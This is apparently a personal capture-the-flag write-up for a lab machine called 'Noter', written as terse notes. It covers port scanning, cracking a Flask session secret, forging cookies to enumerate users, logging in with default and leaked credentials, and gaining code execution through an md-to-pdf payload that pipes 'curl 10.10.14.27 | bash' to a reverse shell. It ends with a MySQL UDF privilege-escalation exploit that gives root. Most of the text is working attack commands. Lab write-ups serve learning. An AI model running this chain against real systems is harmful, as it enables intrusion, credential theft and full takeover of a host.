NMAP...
tarting Nmap 7.80 ( https://nmap.org ) at 2023-05-03 17:02 UTC
Nmap scan report for 10.10.11.160
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-title: Noter
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.13 seconds
WWW...
A note taking application, which stores notes of a user. after tinkering for a hour i didn't find anything interesting then got a hint about something called flask-unsign
It is using flask at background.
Flask Unsign is a penetration testing utility that attempts to uncover a Flask server's secret key by taking a signed session verifying it against a wordlist of commonly used and publicly known secret keys (sourced from books, GitHub, StackOverflow and various other sources).
flask-unsign --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYWRtaW4ifQ.ZVBheA.rXUbROrp7iWuNewWjbc5iWOF1Bo' -w /usr/share/wordlists/rockyou.txt --no-literal-eval
secret123
We have a secret we can create cookie of any user we want', the above cookie in above image is of admin because admin user did not actually exist on the box,
Statergy ->...
we need to enumerate users for that i ll be using bash. and then we can use a curl command or any fuzzing tool on all of the created cookie if any of them is valid or not.
time cat /usr/share/seclists/Usernames/Names/names.txt | \
pipe> while read user; do \
pipe while> (flask-unsign --sign --cookie "{'logged_in': True, 'username': '$user'}" --secret 'secret123' &); \
pipe while> done > names_cookies
Will it blast?
it did not.
wfuzz -u http://10.10.11.160:5000/dashboard -H "Cookie: session=FUZZ" -w names_cookies --hl 3
pasting the second cookie I got in as user blue.
By mistake i deleted the note before seeing it, 
Shit
Anyways i can access this -> http://10.10.11.160:5000/note/1/
blue : blue@Noter!
got in
default pass : username@sitename!
blue : blue@Noter!
ftp_admin : ftp_admin@Noter!
got in with ftp_admin creds to ftp and got app source code.
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'DB_user'
app.config['MYSQL_PASSWORD'] = 'DB_password'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
it using misc/md-to-pdf.js and then using bash.
searching for md-to-pdf.js its vulnerable to rce.
https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880
content of payload.md
---js\n((require("child_process")).execSync("curl 10.10.14.27 | bash"))\n---RCE
and of course index.html is my revshell.
Get Root...
mysql is running as root
https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c
follow the exploit just one modification.
mysql > SHOW VARIABLES LIKE '%plugin%';
output of the command is /usr/lib/x86_64-linux-gnu/mariadb19/plugin, we have to use this instead of what the above exploit says.
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
use mysql;
create table foo(line blob);
insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('curl 10.10.14.27 | bash');
ofcourse index.html is revershell to port `Guess`